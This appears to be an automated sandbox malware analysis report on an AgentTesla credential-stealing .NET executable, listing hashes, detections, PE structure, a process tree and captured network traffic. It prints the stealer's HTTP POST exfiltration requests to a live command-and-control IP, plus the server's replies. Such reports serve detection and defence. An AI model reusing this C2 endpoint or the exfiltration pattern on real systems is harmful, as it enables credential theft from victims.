SSDEEP: 12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5: CC144808DBAF00E03294347EADC8E779
SHA1: A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256: 3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512: A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2688096
Entropy (8bit): 6.409257767499659
Encrypted: false
SSDEEP: 49152:PAa87OQFMC/tWcHUgeRjRKW+0UpzIrFjB5u901ACUTum:PAa87zLtWI6jX+0UFIrZ//1a
MD5: B3A917344F5610BEEC562556F11300FA
SHA1: F7B1AC747E7705A21ACDD582B63800016BE21774
SHA-256: 7BA4838E3356B69254730E891ADD84092E3143016A515FF3E990CE19874A2459
SHA-512: 2D1515D75C3E5870F2FB57B321E02CF9611D30F3716A5670F0C32781AEB96576508B3B1C9717B2AC041B7752865842DD8AF7AF712988FF90FE3E6847821FFE60
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 2%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: SecuriteInfo.com.W32.AIDetectNet.01.9473.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.AIDetectNet.01.10857.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.AIDetectNet.01.20458.exe, Detection: malicious
• Filename: Doc151.pif.exe, Detection: malicious
• Filename: Doc0627.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.AIDetectNet.01.1410.exe, Detection: malicious
• Filename: Request For Quotation And Sample.pdf.exe, Detection: malicious
• Filename: RFQ.exe, Detection: malicious
• Filename: INVOICE.exe, Detection: malicious
• Filename: SecuriteInfo.com.IL.Trojan.MSILZilla.13134.2490.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.AIDetectNet.01.2799.exe, Detection: malicious
• Filename: gqyMDfZZ4K.exe, Detection: malicious
• Filename: Neves n 0rder.exe, Detection: malicious
• Filename: products specification.exe, Detection: malicious
• Filename: 0JupZJZDCk.exe, Detection: malicious
• Filename: TT COPY.exe, Detection: malicious
• Filename: IAENMAIL-A4-220222-0830-0005036.pdf.exe, Detection: malicious
• Filename: 0000002065.pdf.exe, Detection: malicious
• Filename: ldin.exe, Detection: malicious
• Filename: 2de5fe686b665d9aeb98b075fb139e33fffe278986a15.exe, Detection: malicious
Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........d..O..O..O......O......O..v...O..v...O.....O......O.....O..=:..O..=:..O..=:..O..=:..O..v...O..O...N.......O......O......O......O..Rich.O..........PE..L....`.Z.........."......."..8............... "...@.......................... )......!)...@...... ..................d.".V.....#.......#.L.............(.`>....'.46....".T...........................`...@.............#..............................text...d."......."................. ..`.data...,.....".......".............@....idata........#.......#.............@..@.tls..........#.......#.............@....rsrc...L.....#.......#.............@..@.reloc..46....'..8....'.............@..B........................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 521216
Entropy (8bit): 6.68537661395277
Encrypted: false
SSDEEP: 12288:hBuapACH7mAxDuS7yYjcQtjHwCq+qS5TiJ4gnAGZyOwG:1XmYjcQtjHwCq+qS5TiJ4gnAKyOwG
MD5: 18E913EC810A1131C23D6FEA7526C4F8
SHA1: 96C426169C87505E950898AD38913CC726BF198D
SHA-256: 548A9D790D8D54BAF1FAF9C67133398A96FAD5ADD7DAA35E89AAD9D777BD103D
SHA-512: F7DB06C94A8F5D052D66F1297DF5F1A60892F15A8E4AB9069F6654DD8119738E62FC1779D220B49710D8DA067CC2A437909BEDC75C86B248B196A86F31224F0A
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 51%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................."..........^A... ...`....@.. .......................`.......Y....@..................................A..O....`.......................@....................................................... ............... ..H............text...d!... ...".................. ..`.rsrc........`.......$..............@..@.reloc.......@......................@..B................@A......H.......P...........3...d=...F..........................................IvMeedev..(....*..-.*(....&*2~{....(....*..(....*.*..{....*..{....*:~.......(....*..{....*..{....*:~.......(....*..{....*6~......(....*..{....*..{....*..{....*..{....*..{....*..{....*..{....*.~....(....*.~Q...(....*.~....(....*..{....*.~6...(....*..{....*..{....*..{....*6~F.....(....*6~G.....(....*..0...........{....#..^nY7^@#.....@O@(i...X(j...(.....z....#......M@#.....@M@(k...X(j...("....y....#....]h@#
Process: C:\Windows\SysWOW64\cmd.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
                                                            Process:C:\Users\user\AppData\Roaming\excel\excel.exe
                                                            File Type:ASCII text, with very long lines
                                                            Category:dropped
                                                            Size (bytes):6809
                                                            Entropy (8bit):4.315685828355093
                                                            Encrypted:false
                                                            SSDEEP:96:zKHDGKD7zrrRYZZ/HPw4//HP/HH6K1jqQiGyGTFchzCKtihKCsO2b0N/+7vKAKPO:YrRYZXCKgQifr8sC/635P
                                                            MD5:DA37CE62FC9ABAB3226A1797FF449487
                                                            SHA1:18F29B4F3B1D12BA18DF2EF8964DA20107EEFFC9
                                                            SHA-256:80EAB2A83F12150619544DBFFDD130D60B6869EE742F9000F8E3109F406FAD6E
                                                            SHA-512:5A8BF4140440BCB218CFE90A3371AE761212BC4364DC7E7C055980D3FAB4C4E4499B1CADB13666D4D5F03B6AE835AEE4B44F78D4B2A4AA4ABDF20D8161B12F66
                                                            Malicious:false
                                                            Preview:Microsoft (R) Visual Basic Compiler version 14.7.3056.for Visual Basic 2012.Copyright (c) Microsoft Corporation. All rights reserved...This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to Visual Basic 2012, which is no longer the latest version. For compilers that support newer versions of the Visual Basic programming language, see http://go.microsoft.com/fwlink/?LinkID=533241.. Visual Basic Compiler Options.. - OUTPUT FILE -./out:<file> Specifies the output file name../target:exe Create a console application (default). (Short form: /t)./target:winexe Create a Windows application../target:library Create a library assembly../target:module Create a module that can be added to an assembly../target:appcontainerexe Create a Windows application that runs in AppContainer../ta
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.68537661395277
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:pdP5Rv9pPW.exe
                                                            File size:521216
                                                            MD5:18e913ec810a1131c23d6fea7526c4f8
                                                            SHA1:96c426169c87505e950898ad38913cc726bf198d
                                                            SHA256:548a9d790d8d54baf1faf9c67133398a96fad5add7daa35e89aad9d777bd103d
                                                            SHA512:f7db06c94a8f5d052d66f1297df5f1a60892f15a8e4ab9069f6654dd8119738e62fc1779d220b49710d8da067cc2a437909bedc75c86b248b196a86f31224f0a
                                                            SSDEEP:12288:hBuapACH7mAxDuS7yYjcQtjHwCq+qS5TiJ4gnAGZyOwG:1XmYjcQtjHwCq+qS5TiJ4gnAKyOwG
                                                            TLSH:B6B41E1C3E011A66FD0F9130CC092A857BA60FA33341A99757BF3FCAAB6F0566F45985
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................."..........^A... ...`....@.. .......................`.......Y....@................................
                                                            Icon Hash:f0b2f26dd88ec6e8
                                                            Entrypoint:0x47415e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x63041C8C [Tue Aug 23 00:17:16 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7410c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0xcdba | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x84000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x72164 | 0x72200 | False | 0.6246641395125958 | data | 6.786232224405754 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x76000 | 0xcdba | 0xce00 | False | 0.3315951152912621 | data | 4.354166179939291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x84000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x762c4 | 0xea8 | data | English | United States
RT_ICON | 0x7716c | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x77a14 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x77f7c | 0x1cec | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x79c68 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 64767, next used block 4282318848 | English | United States
RT_ICON | 0x7de90 | 0x25a8 | data | English | United States
RT_ICON | 0x80438 | 0x10a8 | data | English | United States
RT_ICON | 0x814e0 | 0x988 | data | English | United States
RT_ICON | 0x81e68 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_GROUP_ICON | 0x822d0 | 0x84 | data | English | United States
RT_VERSION | 0x82354 | 0x340 | data | English | United States
RT_MANIFEST | 0x82694 | 0x726 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
mscoree.dll | _CorExeMain
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/28/22-17:19:41.645966 | TCP | 2034579 | ET TROJAN AgentTesla Communicating with CnC Server | 49717 | 80 | 192.168.2.4 | 141.98.6.75
08/28/22-17:21:11.426704 | TCP | 2034579 | ET TROJAN AgentTesla Communicating with CnC Server | 49753 | 80 | 192.168.2.4 | 141.98.6.75
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2022 17:19:41.617660046 CEST | 49717 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:19:41.645329952 CEST | 80 | 49717 | 141.98.6.75 | 192.168.2.4
Aug 28, 2022 17:19:41.645463943 CEST | 49717 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:19:41.645966053 CEST | 49717 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:19:41.676053047 CEST | 80 | 49717 | 141.98.6.75 | 192.168.2.4
Aug 28, 2022 17:19:41.676698923 CEST | 49717 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:19:41.717947960 CEST | 80 | 49717 | 141.98.6.75 | 192.168.2.4
Aug 28, 2022 17:19:41.870405912 CEST | 49717 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:19:46.736474991 CEST | 80 | 49717 | 141.98.6.75 | 192.168.2.4
Aug 28, 2022 17:19:46.737335920 CEST | 49717 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:20:56.445935011 CEST | 49717 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:21:11.399175882 CEST | 49753 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:21:11.426378965 CEST | 80 | 49753 | 141.98.6.75 | 192.168.2.4
Aug 28, 2022 17:21:11.426496029 CEST | 49753 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:21:11.426703930 CEST | 49753 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:21:11.457539082 CEST | 80 | 49753 | 141.98.6.75 | 192.168.2.4
Aug 28, 2022 17:21:11.458311081 CEST | 49753 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:21:11.502499104 CEST | 80 | 49753 | 141.98.6.75 | 192.168.2.4
Aug 28, 2022 17:21:11.652420044 CEST | 49753 | 80 | 192.168.2.4 | 141.98.6.75
Aug 28, 2022 17:21:16.503520966 CEST | 80 | 49753 | 141.98.6.75 | 192.168.2.4
Aug 28, 2022 17:21:16.503599882 CEST | 49753 | 80 | 192.168.2.4 | 141.98.6.75
                                                            • 141.98.6.75
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49717 | 141.98.6.75 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | kBytes transferred | Direction | Data
Aug 28, 2022 17:19:41.645966053 CEST | 10767 | OUT | POST /weption/inc/0986372054b5f8.php HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 141.98.6.75
                                                            Content-Length: 580
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Aug 28, 2022 17:19:41.676053047 CEST | 10767 | IN | HTTP/1.1 100 Continue
Aug 28, 2022 17:19:41.676698923 CEST | 10768 | OUT | Data Raw: 70 3d 41 67 50 4b 49 45 4d 73 4d 35 77 6c 41 30 37 56 52 6e 48 2f 4b 44 6e 50 4b 54 30 48 51 38 4f 45 77 35 78 33 51 45 36 45 57 75 58 46 7a 4f 50 33 76 6c 4f 32 54 75 53 53 45 4f 31 76 4a 50 4e 39 32 71 32 61 33 67 61 30 66 47 50 61 69 67 72 63
                                                            Data Ascii: p=AgPKIEMsM5wlA07VRnH/KDnPKT0HQ8OEw5x3QE6EWuXFzOP3vlO2TuSSEO1vJPN92q2a3ga0fGPaigrck7DC5Z49tJDT%2BXo73d3fvcYnbGR0KYqQKmtPL7vmLI768cdQrxvcTMDusgY7hIOdgUi3bTdcEThCyfZo3X%2BFrsd1mLn4emqzdOxy3m8gkTAnZRr3ms4QI8KY1H/zM79/CZNKp4RMttYjpPF9PY/%2Bhv4UPHA
Aug 28, 2022 17:19:41.717947960 CEST | 10769 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 28 Aug 2022 15:19:41 GMT
                                                            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                            X-Powered-By: PHP/8.1.6
                                                            Content-Length: 552
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 5b 5b 22 49 6e 74 65 72 6e 65 74 20 44 6f 77 6e 6c 6f 61 64 20 4d 61 6e 61 67 65 72 22 2c 22 68 74 74 70 3a 2f 2f 58 37 72 7a 64 79 38 78 33 49 72 4a 50 2e 6e 65 74 22 2c 22 43 66 54 4d 37 4c 58 47 69 61 52 30 22 2c 22 6e 55 31 46 44 59 34 31 77 52 4d 4f 22 5d 2c 5b 22 4a 44 6f 77 6e 6c 6f 61 64 65 72 22 2c 22 0a 6d 4b 79 56 74 63 55 6a 4e 49 6f 2e 22 2c 22 25 30 41 70 62 65 64 52 42 50 6d 6e 75 6c 6c 22 2c 22 25 30 41 36 46 34 59 33 4f 47 44 48 33 4f 52 34 4a 45 22 5d 5d 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 54 79 70 65 45 72 72 6f 72 3a 20 73 69 7a 65 6f 66 28 29 3a 20 41 72 67 75 6d 65 6e 74 20 23 31 20 28 24 76 61 6c 75 65 29 20 6d 75 73 74 20 62 65 20 6f 66 20 74 79 70 65 20 43 6f 75 6e 74 61 62 6c 65 7c 61 72 72 61 79 2c 20 6e 75 6c 6c 20 67 69 76 65 6e 20 69 6e 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3a 31 32 37 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 3a 20 65 76 61 6c 28 29 0a 23 31 20 7b 6d 61 69 6e 7d 0a 20 20 74 68 72 6f 77 6e 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 31 32 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                            Data Ascii: [["Internet Download Manager","http://X7rzdy8x3IrJP.net","CfTM7LXGiaR0","nU1FDY41wRMO"],["JDownloader","mKyVtcUjNIo.","%0ApbedRBPmnull","%0A6F4Y3OGDH3OR4JE"]]<br /><b>Fatal error</b>: Uncaught TypeError: sizeof(): Argument #1 ($value) must be of type Countable|array, null given in C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12) : eval()'d code:127Stack trace:#0 C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12): eval()#1 {main} thrown in <b>C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12) : eval()'d code</b> on line <b>127</b><br />


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49753 | 141.98.6.75 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | kBytes transferred | Direction | Data
Aug 28, 2022 17:21:11.426703930 CEST | 11407 | OUT | POST /weption/inc/0986372054b5f8.php HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 141.98.6.75
                                                            Content-Length: 580
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Aug 28, 2022 17:21:11.457539082 CEST | 11407 | IN | HTTP/1.1 100 Continue
Aug 28, 2022 17:21:11.458311081 CEST | 11408 | OUT | Data Raw: 70 3d 41 67 50 4b 49 45 4d 73 4d 35 77 6c 41 30 37 56 52 6e 48 2f 4b 44 6e 50 4b 54 30 48 51 38 4f 45 77 35 78 33 51 45 36 45 57 75 58 46 7a 4f 50 33 76 6c 4f 32 54 75 53 53 45 4f 31 76 4a 50 4e 39 32 71 32 61 33 67 61 30 66 47 50 61 69 67 72 63
                                                            Data Ascii: p=AgPKIEMsM5wlA07VRnH/KDnPKT0HQ8OEw5x3QE6EWuXFzOP3vlO2TuSSEO1vJPN92q2a3ga0fGPaigrck7DC5Z49tJDT%2BXo73d3fvcYnbGR0KYqQKmtPL7vmLI768cdQrxvcTMDusgY7hIOdgUi3bTdcEThCyfZo3X%2BFrsd1mLn4emqzdOxy3m8gkTAnZRr3/apzkYkqCL4A0bee2KrvL4RMttYjpPF9PY/%2Bhv4UPHA
Aug 28, 2022 17:21:11.502499104 CEST | 11409 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 28 Aug 2022 15:21:11 GMT
                                                            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                            X-Powered-By: PHP/8.1.6
                                                            Content-Length: 552
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 5b 5b 22 49 6e 74 65 72 6e 65 74 20 44 6f 77 6e 6c 6f 61 64 20 4d 61 6e 61 67 65 72 22 2c 22 68 74 74 70 3a 2f 2f 58 37 72 7a 64 79 38 78 33 49 72 4a 50 2e 6e 65 74 22 2c 22 43 66 54 4d 37 4c 58 47 69 61 52 30 22 2c 22 6e 55 31 46 44 59 34 31 77 52 4d 4f 22 5d 2c 5b 22 4a 44 6f 77 6e 6c 6f 61 64 65 72 22 2c 22 0a 6d 4b 79 56 74 63 55 6a 4e 49 6f 2e 22 2c 22 25 30 41 70 62 65 64 52 42 50 6d 6e 75 6c 6c 22 2c 22 25 30 41 36 46 34 59 33 4f 47 44 48 33 4f 52 34 4a 45 22 5d 5d 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 54 79 70 65 45 72 72 6f 72 3a 20 73 69 7a 65 6f 66 28 29 3a 20 41 72 67 75 6d 65 6e 74 20 23 31 20 28 24 76 61 6c 75 65 29 20 6d 75 73 74 20 62 65 20 6f 66 20 74 79 70 65 20 43 6f 75 6e 74 61 62 6c 65 7c 61 72 72 61 79 2c 20 6e 75 6c 6c 20 67 69 76 65 6e 20 69 6e 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3a 31 32 37 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 3a 20 65 76 61 6c 28 29 0a 23 31 20 7b 6d 61 69 6e 7d 0a 20 20 74 68 72 6f 77 6e 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 31 32 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                            Data Ascii: [["Internet Download Manager","http://X7rzdy8x3IrJP.net","CfTM7LXGiaR0","nU1FDY41wRMO"],["JDownloader","mKyVtcUjNIo.","%0ApbedRBPmnull","%0A6F4Y3OGDH3OR4JE"]]<br /><b>Fatal error</b>: Uncaught TypeError: sizeof(): Argument #1 ($value) must be of type Countable|array, null given in C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12) : eval()'d code:127Stack trace:#0 C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12): eval()#1 {main} thrown in <b>C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12) : eval()'d code</b> on line <b>127</b><br />



                                                            Target ID:0
                                                            Start time:17:18:58
                                                            Start date:28/08/2022
                                                            Path:C:\Users\user\Desktop\pdP5Rv9pPW.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\pdP5Rv9pPW.exe"
                                                            Imagebase:0x190000
                                                            File size:521216 bytes
                                                            MD5 hash:18E913EC810A1131C23D6FEA7526C4F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            Target ID:2
                                                            Start time:17:19:26
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            Imagebase:0xc40000
                                                            File size:2688096 bytes
                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate

                                                            Target ID:4
                                                            Start time:17:19:28
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:5
                                                            Start time:17:19:29
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
